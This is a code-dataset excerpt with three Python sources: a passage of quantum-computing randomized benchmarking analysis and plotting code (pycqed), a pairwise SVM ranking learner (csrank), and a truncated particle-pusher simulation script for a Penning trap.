hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n msmt_type = hlp_mod.get_param('msmt_type', data_dict, **params)\n keys_out_container = hlp_mod.get_param('keys_out_container', data_dict,\n default_value='', **params)\n if keys_out_container is None or not len(keys_out_container):\n keys_out_container = f'{mobjn}.{msmt_type}'\n\n fit_dicts = hlp_mod.get_param('fit_dicts', data_dict, raise_error=True)\n for keyi in keys_in:\n fit_res = fit_dicts['rb_fit' + keyi]['fit_res']\n hlp_mod.add_param(f'{keys_out_container}.EPC value',\n fit_res.params['error_per_Clifford'].value,\n data_dict, add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.EPC stderr',\n fit_res.params['fidelity_per_Clifford'].stderr,\n data_dict, add_param_method='replace')\n hlp_mod.add_param(\n f'{keys_out_container}.depolarization parameter value',\n fit_res.params['p'].value, data_dict,\n add_param_method='replace')\n hlp_mod.add_param(\n f'{keys_out_container}.depolarization parameter stderr',\n fit_res.params['p'].stderr, data_dict,\n add_param_method='replace')\n\n if 'pf' in keyi:\n A = fit_res.best_values['Amplitude']\n Aerr = fit_res.params['Amplitude'].stderr\n p = fit_res.best_values['p']\n perr = fit_res.params['p'].stderr\n # IBM-style leakage and seepage:\n # https://journals.aps.org/pra/abstract/10.1103/PhysRevA.97.032306\n hlp_mod.add_param(f'{keys_out_container}.IBM-style leakage value',\n A*(1-p),\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.IBM-style leakage stderr',\n np.sqrt((A*perr)**2 + (Aerr*(p-1))**2),\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.IBM-style seepage value',\n (1-A)*(1-p),\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.IBM-style seepage stderr',\n np.sqrt((Aerr*(p-1))**2 + ((A-1)*perr)**2),\n data_dict,\n add_param_method='replace')\n\n # Google-style leakage and seepage:\n # https://journals.aps.org/prl/pdf/10.1103/PhysRevLett.116.020501\n fit_res = fit_dicts['rbleak_fit' + keyi]['fit_res']\n hlp_mod.add_param(f'{keys_out_container}.Google-style leakage value',\n fit_res.best_values['pu'],\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.Google-style leakage stderr',\n fit_res.params['pu'].stderr,\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.Google-style seepage value',\n fit_res.best_values['pd'],\n data_dict,\n add_param_method='replace')\n hlp_mod.add_param(f'{keys_out_container}.Google-style seepage 
stderr',\n fit_res.params['pd'].stderr,\n data_dict,\n add_param_method='replace')\n\n if hlp_mod.get_param('plot_T1_lim', data_dict, default_value=False,\n **params):\n # get T1, T2, gate length from HDF file\n get_meas_obj_coh_times(data_dict, **params)\n F_T1, p_T1 = calc_rb_coherence_limited_fidelity(\n hlp_mod.get_param(f'{mobjn}.T1', data_dict, **params),\n hlp_mod.get_param(f'{mobjn}.T2', data_dict, **params),\n hlp_mod.get_param(f'{mobjn}.ge_sigma', data_dict, **params) *\n hlp_mod.get_param(f'{mobjn}.ge_nr_sigma', data_dict, **params),\n hlp_mod.get_param('gate_decomp', data_dict,\n default_value='HZ', **params))\n hlp_mod.add_param(f'{keys_out_container}.EPC coh_lim', 1-F_T1,\n data_dict, add_param_method='replace')\n hlp_mod.add_param(\n f'{keys_out_container}.depolarization parameter coh_lim', p_T1,\n data_dict, add_param_method='replace')\n\n\ndef prepare_rb_plots(data_dict, keys_in, sweep_type, **params):\n sp, cp, mospm, mobjn, movnm = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['sp', 'cp', 'mospm', 'mobjn', 'movnm'],\n **params)\n\n plot_dicts = OrderedDict()\n keys_in_std = hlp_mod.get_param('keys_in_std', data_dict, raise_error=False,\n **params)\n stpn = hlp_mod.get_param(\n 'state_prob_name', data_dict,\n default_value='gg' if 'corr' in mobjn else 'e', **params)\n classified_msmt = any([v == 3 for v in [len(chs) for chs in movnm.values()]])\n lw = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['lines.linewidth']\n ms = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['lines.markersize']\n llsp = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['legend.labelspacing']\n lcsp = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['legend.columnspacing']\n\n ylabel = hlp_mod.pop_param('ylabel', data_dict, node_params=params)\n if ylabel is None:\n if isinstance(stpn, (tuple, list)):\n # assumed of the form ('gg', '+', 'ee', '-', 'ge', '-', 'eg')\n prob_states = stpn[0::2]\n prob_labels = [f'$P(|{{{p}}}\\\\rangle)$' for p in prob_states]\n ylabel = (2*len(prob_states)-1)*['']\n ylabel[0::2] = prob_labels\n ylabel[1::2] = list(stpn[1::2])\n ylabel = ''.join(ylabel)\n else:\n ylabel = f'Probability, $P(|{{{stpn}}}\\\\rangle)$'\n figure_name_suffix = hlp_mod.get_param('figure_name_suffix', data_dict,\n default_value='', **params)\n for keyi, keys in zip(keys_in, keys_in_std):\n figure_name = f'RB_{keyi}_{mobjn}{figure_name_suffix}'\n sp_name = [p for p in mospm[mobjn] if 'clifford' in p][0]\n\n # plot data\n pd = \\\n plot_mod.prepare_1d_plot_dicts(data_dict=data_dict, keys_in=[keyi],\n figure_name=figure_name,\n ylabel=ylabel,\n sp_name=sp_name,\n yerr_key=keys,\n data_labels=['avg.'],\n plot_params={\n 'zorder': 2, 'marker': 'o',\n 'legend_ncol': 3,\n 'line_kws': {\n 'elinewidth': lw+3,\n 'markersize': ms+1,\n 'alpha_errorbars': 0.25}},\n do_plotting=False, **params)\n plot_dicts.update(pd)\n\n # plot all seeds\n keys_in_all_seeds_data = hlp_mod.get_param('keys_in_all_seeds_data',\n data_dict, **params)\n clf_dim = sweep_type['cliffords']\n seeds_dim = sweep_type['seeds']\n cliffords = sp.get_sweep_params_property('values', clf_dim, sp_name)\n xvals = np.repeat(cliffords, sp.length(seeds_dim)) if clf_dim == 1 \\\n else np.tile(cliffords, sp.length(seeds_dim))\n if keys_in_all_seeds_data is not None:\n\n pd = \\\n plot_mod.prepare_1d_plot_dicts(data_dict=data_dict,\n keys_in=keys_in_all_seeds_data,\n figure_name=figure_name,\n 
xvals=xvals,\n ylabel=ylabel,\n sp_name=sp_name,\n data_labels=['seeds'],\n plot_params={\n 'linestyle': 'none',\n 'marker': '.',\n 'color': 'gray',\n 'line_kws': {'alpha': 0.5},\n 'zorder': 1},\n do_plotting=False, **params)\n plot_dicts.update(pd)\n\n if len(cp.states) != 0:\n # plot cal states\n plot_dicts.update(\n plot_mod.prepare_cal_states_plot_dicts(data_dict=data_dict,\n keys_in=[keyi],\n figure_name=figure_name,\n sp_name=sp_name,\n do_plotting=False,\n **params))\n\n if 'fit_dicts' in data_dict:\n # plot fits\n fit_dicts = data_dict['fit_dicts']\n textstr = ''\n if 'pf' in keyi:\n # plot Google-style leakage fit + textbox\n plot_dicts.update(plot_mod.prepare_fit_plot_dicts(\n data_dict=data_dict,\n figure_name=figure_name,\n fit_names=['rbleak_fit' + keyi],\n plot_params={'color': 'C1',\n 'setlabel': 'fit - Google',\n 'legend_ncol': 3},\n do_plotting=False, **params))\n textstr += get_rb_textbox_properties(\n data_dict, fit_dicts['rbleak_fit' + keyi]['fit_res'],\n textstr_style=['leakage_google'],\n **params)[0]\n\n # plot fit trace\n pd = plot_mod.prepare_fit_plot_dicts(\n data_dict=data_dict,\n figure_name=figure_name,\n fit_names=['rb_fit' + keyi],\n plot_params={'color': 'C0',\n 'setlabel': 'fit - IBM' if 'pf' in keyi else 'fit',\n 'legend_ncol': 3},\n do_plotting=False, **params)\n plot_dicts.update(pd)\n\n # plot coherence-limit\n fit_res = fit_dicts['rb_fit' + keyi]['fit_res']\n if hlp_mod.get_param('plot_T1_lim', data_dict,\n default_value=False, **params) and 'pf' not in keyi:\n keys_out_container = hlp_mod.get_param('keys_out_container',\n data_dict,\n default_value=mobjn,\n **params)\n epc_T1 = hlp_mod.get_param(f'{keys_out_container}.EPC coh_lim',\n data_dict, **params)\n p_T1 = hlp_mod.get_param(\n f'{keys_out_container}.depolarization parameter coh_lim',\n data_dict, **params)\n clfs_fine = np.linspace(cliffords[0], cliffords[-1], 1000)\n T1_limited_curve = fit_res.model.func(\n clfs_fine, fit_res.best_values['Amplitude'], p_T1,\n fit_res.best_values['offset'])\n plot_dicts['t1Lim_' + keyi] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_line',\n 'xvals': clfs_fine,\n 'yvals': T1_limited_curve,\n 'setlabel': 'coh-lim',\n 'do_legend': True,\n 'linestyle': '--',\n 'line_kws': {'linewidth': lw-0.5},\n 'zorder': 0,\n 'marker': ''}\n else:\n epc_T1 = None\n\n # add textbox\n va_text = hlp_mod.get_param('va_text', data_dict, **params)\n if va_text is None:\n va_text = 'top' if 'g' in stpn else 'bottom'\n textstr, ha, hp, va, vp = get_rb_textbox_properties(\n data_dict, fit_res, epc_T1=None if 'pf' in keyi else epc_T1,\n va=va_text,\n textstr_style='leakage_ibm' if 'pf' in keyi else 'regular',\n textstr=textstr if 'pf' in keyi else '', **params)\n plot_dicts['text_msg_' + keyi] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_text',\n 'ypos': vp,\n 'xpos': hp,\n 'horizontalalignment': ha,\n 'verticalalignment': va,\n 'box_props': None,\n 'text_string': textstr}\n\n plot_dicts[list(plot_dicts)[-2]].update({\n 'legend_bbox_to_anchor': (1.025, -0.15),\n 'legend_pos': 'upper right',\n 'legend_labelspacing': llsp-0.25,\n 'legend_columnspacing': lcsp-1,\n 'legend_ncol': 1 if 'pf' in keyi else 2,\n 'yrange': hlp_mod.get_param('yrange', data_dict, **params)\n })\n hlp_mod.add_param('plot_dicts', plot_dicts, data_dict,\n add_param_method='update')\n\n\ndef prepare_irb_plot(data_dict, plot_dict_names_irb_plot=None,\n figure_name=None, **params):\n\n plot_dicts_updated = OrderedDict()\n do_plotting = params.pop('do_plotting', False)\n if figure_name is None:\n figure_name = 'IRB'\n\n 
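# assemble the combined RB vs IRB comparison figure: legend entries carrying\n # the EPC values, the all-seeds scatter, the copied fit traces, and a text\n # box with the interleaved gate error\n 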
mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'],\n **params)\n\n if plot_dict_names_irb_plot is None:\n plot_dict_names_irb_plot = hlp_mod.get_param(\n 'plot_dict_names_irb_plot', data_dict, **params)\n\n plot_dicts = hlp_mod.get_param('plot_dicts', data_dict, **params)\n for label in ['rb', 'irb']:\n epc_value = hlp_mod.get_param(f'{mobjn}.{label}.EPC value',\n data_dict, **params)\n print(epc_value)\n leg_label = ''\n if epc_value is not None:\n epc_stderr = hlp_mod.get_param(f'{mobjn}.{label}.EPC stderr',\n data_dict, **params)\n leg_label = f'{label.upper()}:\\t' \\\n f'{100*epc_value:.2f}%$\\\\pm${100*epc_stderr:.2f}% EPC'\n print(leg_label)\n plot_dicts_updated[f'legend_data_IRB_{label}'] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_line',\n 'xvals': [],\n 'yvals': [],\n 'color': 'C0' if label == 'rb' else 'C1',\n 'marker': 'o',\n 'linestyle': '-',\n 'setlabel': leg_label,\n }\n\n pd_plot_type = [pdn for pdn in plot_dict_names_irb_plot['rb']\n if 'seeds' in pdn]\n if len(pd_plot_type):\n pd_name = plot_dict_names_irb_plot['rb'][pd_plot_type[0]]\n plot_dicts_updated['legend_seeds_IRB'] = \\\n deepcopy(plot_dicts[f'{pd_name}'])\n plot_dicts_updated['legend_seeds_IRB'].update({\n 'xvals': [], 'yvals': [], 'yerr': None,\n 'setlabel': 'all seeds'})\n\n cz_err = hlp_mod.get_param('cz_err_value', data_dict, **params)\n if cz_err is None:\n cz_err = hlp_mod.get_param(\n 'correlation_object.average_gate_error_CZ value', data_dict)\n cz_err_stderr = hlp_mod.get_param('cz_err_stderr', data_dict, **params)\n if cz_err_stderr is None:\n cz_err_stderr = hlp_mod.get_param(\n 'correlation_object.average_gate_error_CZ stderr', data_dict)\n if cz_err is not None:\n textstr = \\\n f'Gate error:\\n{100*cz_err:.2f}%$\\\\pm${100*cz_err_stderr:.2f}%'\n plot_dicts_updated['text_msg_IRB'] = {\n 'fig_id': figure_name,\n 'plotfn': 'plot_text',\n 'ypos': 0.05,\n 'xpos': 0.4,\n 'horizontalalignment': 'left',\n 'verticalalignment': 'bottom',\n 'box_props': None,\n 'text_string': textstr}\n\n for label in ['rb', 'irb']:\n for plot_type in list(plot_dict_names_irb_plot[label])[::-1]:\n pd_name = plot_dict_names_irb_plot[label][plot_type]\n plot_dicts_updated[f'{pd_name} IRB'] = deepcopy(plot_dicts[pd_name])\n updated_vals = {'fig_id': figure_name,\n 'color': 'C0' if label == 'rb' else 'C1',\n 'setlabel': '', 'legend_ncol': 1}\n plot_dicts_updated[f'{pd_name} IRB'].update(updated_vals)\n\n plotsize = plot_mod.get_default_plot_params(\n set_params=False, return_full_rc_params=True)['figure.figsize']\n plotsize = (plotsize[0], 3*plotsize[1])\n last_pd = plot_dicts_updated[list(plot_dicts_updated)[-1]]\n last_pd.update({'legend_bbox_to_anchor': (0.35, 0.08),\n 'legend_ncol': 1,\n 'legend_pos': 'lower left',\n 'plotsize': plotsize})\n\n hlp_mod.add_param('plot_dicts', plot_dicts_updated, data_dict,\n add_param_method='update')\n if do_plotting:\n getattr(plot_mod, 'plot')(data_dict, keys_in=list(plot_dicts),\n **params)\n\n\ndef get_rb_leakage_ibm_textstr(data_dict, fit_res=None, **params):\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n msmt_type = hlp_mod.get_param('msmt_type', data_dict, **params)\n keys_out_container = hlp_mod.get_param('keys_out_container', data_dict,\n default_value='', **params)\n if keys_out_container is None or not len(keys_out_container):\n keys_out_container = f'{mobjn}.{msmt_type}'\n textstr = 'IBM style:'\n p_value = hlp_mod.get_param(\n f'{keys_out_container}.depolarization parameter value', 
data_dict,\n raise_error=True)\n p_stderr = hlp_mod.get_param(\n f'{keys_out_container}.depolarization parameter stderr', data_dict)\n textstr += f'\\np = {100*p_value:.4f}%'\n if p_stderr is not None:\n textstr += f'$\\pm$ {100*p_stderr:.3f}%'\n\n L_value = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style leakage value', data_dict,\n raise_error=True)\n textstr += f'\\nL = {100*L_value:.4f}%'\n L_stderr = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style leakage stderr', data_dict)\n if L_stderr is not None:\n textstr += f'$\\pm$ {100*L_stderr:.3f}%'\n\n S_value = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style seepage value', data_dict,\n raise_error=True)\n textstr += f'\\nS = {100*S_value:.4f}%'\n S_stderr = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style seepage stderr', data_dict)\n if S_stderr is not None:\n textstr += f'$\\pm$ {100*S_stderr:.3f}%'\n return textstr\n\n\ndef get_rb_leakage_google_textstr(fit_res, **params):\n textstr = 'Google style:'\n textstr += ('\\n$p_{\\\\uparrow}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pu'].value*100,\n fit_res.params['pu'].stderr*100) +\n '\\n$p_{\\\\downarrow}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pd'].value*100,\n fit_res.params['pd'].stderr*100) +\n '\\n$p_0$' + ' = {:.2f}% $\\pm$ {:.2f}%\\n'.format(\n fit_res.params['p0'].value,\n fit_res.params['p0'].stderr))\n return textstr\n\n\ndef get_rb_regular_textstr(fit_res, epc_T1=None, **params):\n textstr = ('$r_{\\mathrm{Cl}}$' + ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n (1-fit_res.params['fidelity_per_Clifford'].value)*100,\n fit_res.params['fidelity_per_Clifford'].stderr*100))\n if epc_T1 is not None:\n textstr += ('\\n$r_{\\mathrm{coh-lim}}$ = ' +\n '{:.3f}%'.format(epc_T1*100))\n textstr += ('\\n' + 'p = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['p'].value*100, fit_res.params['p'].stderr*100))\n textstr += ('\\n' + r'$\\langle \\sigma_z \\rangle _{m=0}$ = ' +\n '{:.2f} $\\pm$ {:.2f}'.format(\n fit_res.params['Amplitude'].value +\n fit_res.params['offset'].value,\n np.sqrt(fit_res.params['offset'].stderr**2 +\n fit_res.params['Amplitude'].stderr**2)))\n return textstr\n\n\ndef get_cz_irb_textstr(fit_res, epc_T1=None, **params):\n suffix = params.get('suffix', 'RB')\n textstr = (f'$r_{{\\mathrm{{Cl}}, {{{suffix}}}}}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n (1-fit_res.params['fidelity_per_Clifford'].value)*100,\n fit_res.params['fidelity_per_Clifford'].stderr*100))\n if epc_T1 is not None:\n textstr += ('\\n$r_{\\mathrm{coh-lim}}$ = ' +\n '{:.3f}%'.format(epc_T1*100))\n textstr += (f'\\n$p_{{\\\\uparrow, {suffix}}}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pu'].value*100,\n fit_res.params['pu'].stderr*100) +\n f'\\n$p_{{\\\\downarrow, {suffix}}}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pd'].value*100,\n fit_res.params['pd'].stderr*100))\n return textstr\n\n\ndef get_rb_textbox_properties(data_dict, fit_res, epc_T1=None,\n textstr_style=(), textstr='', **params):\n if len(textstr_style) != 0:\n textstr += '\\n'\n if 'regular' in textstr_style:\n textstr += get_rb_regular_textstr(fit_res, epc_T1, **params)\n if 'leakage_google' in textstr_style:\n textstr += get_rb_leakage_google_textstr(fit_res, **params)\n if 'leakage_ibm' in textstr_style:\n textstr += get_rb_leakage_ibm_textstr(data_dict, **params)\n if 'irb' in textstr_style:\n textstr += get_cz_irb_textstr(fit_res, **params)\n if len(textstr) == 0:\n raise NotImplementedError(f'The textstring style {textstr_style} '\n f'has not been 
implemented yet.')\n\n va = 'top'\n vp = -0.15\n ha = 'left'\n hp = -0.12\n\n return textstr, ha, hp, va, vp\n\n\ndef irb_gate_error(data_dict, keys_container_rb, keys_container_irb, **params):\n \"\"\"\n Calculates the average gate error from a set of RB-IRB measurements and\n saves it in data_dict.\n :param data_dict: OrderedDict containing the results of running rb_analysis\n node.\n :param params: keyword arguments:\n meas_obj_names (str): name of the measurement object\n for which to calculate average gate error.\n Should be correlation_object for a two-qubit RB.\n d (int): dimension of the Hilbert space\n interleaved_gate (str or int): the interleaved gate for which to\n calculate average gate error.\n\n Assumptions:\n - meas_obj_names, d, interleaved_gate must exist either in data_dict,\n metadata, or params\n \"\"\"\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n d = hlp_mod.get_param('d', data_dict, raise_error=True, **params)\n interleaved_gate = hlp_mod.get_param(\n 'interleaved_gate', data_dict, raise_error=True, **params)\n if interleaved_gate == 4368:\n interleaved_gate = 'CZ'\n\n keys_out_container = hlp_mod.get_param('keys_out_container', data_dict,\n default_value='', **params)\n prb = hlp_mod.get_param(\n f'{keys_container_rb}.depolarization parameter value', data_dict,\n raise_error=True, **params)\n prb_err = hlp_mod.get_param(\n f'{keys_container_rb}.depolarization parameter stderr', data_dict,\n raise_error=True, **params)\n pirb = hlp_mod.get_param(\n f'{keys_container_irb}.depolarization parameter value', data_dict,\n raise_error=True, **params)\n pirb_err = hlp_mod.get_param(\n f'{keys_container_irb}.depolarization parameter stderr', data_dict,\n raise_error=True, **params)\n\n if keys_out_container is None or not len(keys_out_container):\n keys_out_container = f'{mobjn}.average_gate_error_{interleaved_gate}'\n if mobjn not in keys_out_container:\n keys_out_container = f'{mobjn}.{keys_out_container}'\n hlp_mod.add_param(f'{keys_out_container}.value',\n ((d-1)/d)*(1 - pirb/prb),\n data_dict, **params)\n hlp_mod.add_param(f'{keys_out_container}.stderr',\n ((d-1)/d)*np.sqrt((pirb_err*prb)**2 +\n (prb_err*pirb)**2)/(prb**2),\n data_dict, **params)\n\n\ndef calc_rb_coherence_limited_fidelity(T1, T2, pulse_length, gate_decomp='HZ'):\n \"\"\"\n Formula from Asaad et al. (2016):\n https://www.nature.com/articles/npjqi201629\n\n Returns:\n F_cl (float): decoherence limited fidelity\n p (float): decoherence limited depolarization parameter\n \"\"\"\n # Np = 1.875 # Avg. number of gates per Clifford for XY decomposition\n # Np = 1.125 # Avg. number of gates per Clifford for HZ decomposition\n if gate_decomp == 'HZ':\n Np = 1.125\n elif gate_decomp == 'XY':\n Np = 1.875\n else:\n raise ValueError('Gate decomposition not recognized.')\n\n F_cl = (1/6*(3 + 2*np.exp(-1*pulse_length/(T2)) +\n np.exp(-pulse_length/T1)))**Np\n p = 2*F_cl - 1\n\n return F_cl, p\n\n\ndef get_meas_obj_coh_times(data_dict, extract_T2s=True, **params):\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n # Get from the hdf5 file any parameters specified in\n # params_dict and numeric_params.\n params_dict = {}\n s = 'Instrument settings.' 
+ mobjn\n for trans_name in ['', '_ef']:\n if hlp_mod.get_param(f'{mobjn}.T1{trans_name}', data_dict) is None:\n params_dict[f'{mobjn}.T1{trans_name}'] = s + f'.T1{trans_name}'\n if hlp_mod.get_param(f'{mobjn}.T2{trans_name}', data_dict) is None:\n params_dict[f'{mobjn}.T2{trans_name}'] = s + (\n f'.T2_star{trans_name}' if extract_T2s else f'.T2{trans_name}')\n for trans_name in ['ge', 'ef']:\n if hlp_mod.get_param(f'{mobjn}.{trans_name}_sigma', data_dict) is None and \\\n hlp_mod.get_param(f'{mobjn}.{trans_name}_nr_sigma', data_dict) is None:\n params_dict[f'{mobjn}.{trans_name}_sigma'] = \\\n s + f'.{trans_name}_sigma'\n params_dict[f'{mobjn}.{trans_name}_nr_sigma'] = \\\n s + f'.{trans_name}_nr_sigma'\n if len(params_dict) > 0:\n hlp_mod.get_params_from_hdf_file(data_dict, params_dict=params_dict,\n numeric_params=list(params_dict),\n **params)\n\n\ndef calculate_rb_confidence_intervals(\n nr_seeds, nr_cliffords, conf_level=0.68, depolariz_param=1,\n epsilon_guess=0.01, d=2):\n\n # From Helsen et al. (2017)\n # For each number of cliffords in nr_cliffords (array), finds epsilon\n # such that with probability greater than conf_level, the true value of\n # the survival probability, p_N_m, for a given N=nr_seeds and\n # m=nr_cliffords, is in the interval\n # [p_N_m_measured-epsilon, p_N_m_measured+epsilon]\n # See Helsen et al. (2017) for more details.\n\n # eta is the SPAM-dependent prefactor defined in Helsen et al. (2017)\n epsilon = []\n delta = 1-conf_level\n infidelity = (d-1)*(1-depolariz_param)/d\n\n for n_cl in nr_cliffords:\n if n_cl == 0:\n epsilon.append(0)\n else:\n if d == 2:\n V_short_n_cl = (13*n_cl*infidelity**2)/2\n V_long_n_cl = 7*infidelity/2\n V = min(V_short_n_cl, V_long_n_cl)\n else:\n V_short_n_cl = \\\n (0.25*(-2+d**2)/((d-1)**2)) * (infidelity**2) + \\\n (0.5*n_cl*(n_cl-1)*(d**2)/((d-1)**2)) * (infidelity**2)\n V1 = 0.25*((-2+d**2)/((d-1)**2))*n_cl*(infidelity**2) * \\\n depolariz_param**(n_cl-1) + ((d/(d-1))**2) * \\\n (infidelity**2)*(\n (1+(n_cl-1)*(depolariz_param**(2*n_cl)) -\n n_cl*(depolariz_param**(2*n_cl-2))) /\n (1-depolariz_param**2)**2 )\n V = min(V1, V_short_n_cl)\n H = lambda eps: (1/(1-eps))**((1-eps)/(V+1)) * \\\n (V/(V+eps))**((V+eps)/(V+1)) - \\\n (delta/2)**(1/nr_seeds)\n epsilon.append(optimize.fsolve(H, epsilon_guess)[0])\n return np.asarray(epsilon)\n\n\n","sub_path":"pycqed/analysis_v3/randomized_benchmarking_analysis.py","file_name":"randomized_benchmarking_analysis.py","file_ext":"py","file_size_in_byte":65189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"191991695","text":"import logging\n\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\nfrom sklearn.utils import check_random_state\n\nfrom csrank.learner import Learner\nfrom csrank.util import print_dictionary\n\n\nclass PairwiseSVM(Learner):\n def __init__(\n self,\n C=1.0,\n tol=1e-4,\n normalize=True,\n fit_intercept=True,\n random_state=None,\n **kwargs,\n ):\n \"\"\" Create an instance of the PairwiseSVM model for any preference learner.\n\n Parameters\n ----------\n C : float, optional\n Penalty parameter of the error term\n tol : float, optional\n Optimization tolerance\n normalize : bool, optional\n If True, the data will be normalized before fitting.\n fit_intercept : bool, optional\n If True, the linear model will also fit an intercept.\n random_state : int, RandomState instance or None, optional\n Seed of the pseudorandom 
generator or a RandomState instance\n **kwargs\n Keyword arguments for the algorithms\n\n References\n ----------\n [1] Joachims, T. (2002, July). \"Optimizing search engines using clickthrough data.\", Proceedings of the eighth ACM SIGKDD international conference on Knowledge discovery and data mining (pp. 133-142). ACM.\n \"\"\"\n self.normalize = normalize\n self.C = C\n self.tol = tol\n self.logger = logging.getLogger(\"RankSVM\")\n self.random_state = random_state\n self.threshold_instances = int(1e10)\n self.fit_intercept = fit_intercept\n self.weights = None\n self.model = None\n\n def fit(self, X, Y, **kwargs):\n \"\"\"\n Fit a generic preference learning model on a provided set of queries.\n The provided queries can be of a fixed size (numpy arrays).\n\n Parameters\n ----------\n X : numpy array, shape (n_samples, n_objects, n_features)\n Feature vectors of the objects\n Y : numpy array, shape (n_samples, n_objects, n_features)\n Preferences in form of Orderings or Choices for given n_objects\n **kwargs\n Keyword arguments for the fit function\n\n \"\"\"\n self.random_state_ = check_random_state(self.random_state)\n _n_instances, self.n_objects_fit_, self.n_object_features_fit_ = X.shape\n x_train, y_single = self._convert_instances_(X, Y)\n if x_train.shape[0] > self.threshold_instances:\n self.model = LogisticRegression(\n C=self.C,\n tol=self.tol,\n fit_intercept=self.fit_intercept,\n random_state=self.random_state_,\n )\n self.logger.info(\"Logistic Regression model \")\n else:\n self.model = LinearSVC(\n C=self.C,\n tol=self.tol,\n fit_intercept=self.fit_intercept,\n random_state=self.random_state_,\n )\n self.logger.info(\"Linear SVC model \")\n\n if self.normalize:\n std_scalar = StandardScaler()\n x_train = std_scalar.fit_transform(x_train)\n self.logger.debug(\"Finished Creating the model, now fitting started\")\n\n self.model.fit(x_train, y_single)\n self.weights = self.model.coef_.flatten()\n if self.fit_intercept:\n self.weights = np.append(self.weights, self.model.intercept_)\n self.logger.debug(\"Fitting Complete\")\n\n def _predict_scores_fixed(self, X, **kwargs):\n assert X.shape[-1] == self.n_object_features_fit_\n self.logger.info(\n \"For Test instances {} objects {} features {}\".format(*X.shape)\n )\n if self.fit_intercept:\n scores = np.dot(X, self.weights[:-1])\n else:\n scores = np.dot(X, self.weights)\n self.logger.info(\"Done predicting scores\")\n return np.array(scores)\n\n def _convert_instances_(self, X, Y):\n raise NotImplementedError\n\n def set_tunable_parameters(self, C=1.0, tol=1e-4, **point):\n \"\"\"\n Set tunable parameters of the PairwiseSVM model to the values provided.\n\n Parameters\n ----------\n C : float\n Penalty parameter of the error term of the SVM classifier\n tol : float\n Optimization tolerance of the SVM classifier\n point: dict\n Dictionary containing parameter values which are not tuned for the network\n \"\"\"\n self.tol = tol\n self.C = C\n if len(point) > 0:\n self.logger.warning(\n \"This ranking algorithm does not support\"\n \" tunable parameters\"\n \" called: {}\".format(print_dictionary(point))\n )\n","sub_path":"csrank/core/pairwise_svm.py","file_name":"pairwise_svm.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"79737682","text":"import numpy as np\nfrom tools.writing import wp_dump\nfrom tools.plotting import *\nfrom pushers.boris_sdc import boris_SDC\nfrom pushers.coll import coll\n# from pushers.rel_col18 import 
implicit_coll\nfrom pushers.gauss_legendre import CollGaussLegendre\nfrom pushers.gauss_lobatto import CollGaussLobatto\n\nfrom penning import config\n\n\nsims = [10,20,40,80,160,320,640]\ntend = 10\n\nM = 3\nK_range = [2]\n\nc = 10\nq = 1\nlabel = \"A\"\n# gamma_max = 1.0000000000005\ngamma_max = 5.\nbeta_max = np.sqrt(1-1./gamma_max**2.)\nuy_max = beta_max*c\n\nconf = config(q=q,c=c)\n\nnew = True\n\nfor K in K_range:\n new = True\n for Nt in sims:\n dt = tend/Nt\n\n nq = 1\n\n pos = np.zeros((nq,3),dtype=np.float)\n vel = np.zeros((nq,3),dtype=np.float)\n\n vel[:,1] = np.linspace(uy_max/8,uy_max,nq)\n vel[:,2] = np.sqrt(1-1./gamma_max**2.)\n\n pos = np.array([[10.,0.,0.]])\n vel = np.array([[100.,0.,100.]])\n\n # gamma = gu(vel,c=c)\n # lfreq = -q*Bfield/(1*c*gamma)\n # larmor = vel[:,1]/gamma/lfreq\n # #larmor = 1*vel[:,1]/(-q*B)\n # pos[:,0] = larmor\n\n t = 0\n\n x_array = [pos]\n x2_array = [pos]\n v_array = [vel]\n t_array = [t]\n\n col = coll(CollGaussLobatto,dt,nq,K=K,M=M,predictor=True)\n rx_array = [np.linalg.norm(col.Rx,axis=1)]\n rv_array = [np.linalg.norm(col.Rv,axis=1)]\n\n # Collocation solution stuff\n # posc = np.copy(pos)\n # velc = np.copy(vel)\n # colc = coll(CollGaussLobatto,dt,nq,M=5,K=1,c=c,q=q)\n\n for ti in range(1,Nt+1):\n t = ti*dt\n\n pos, vel, col = boris_SDC(pos,vel,col,conf)\n # print(G(vel,c=c)/c*100)\n # posc, velc, colc = 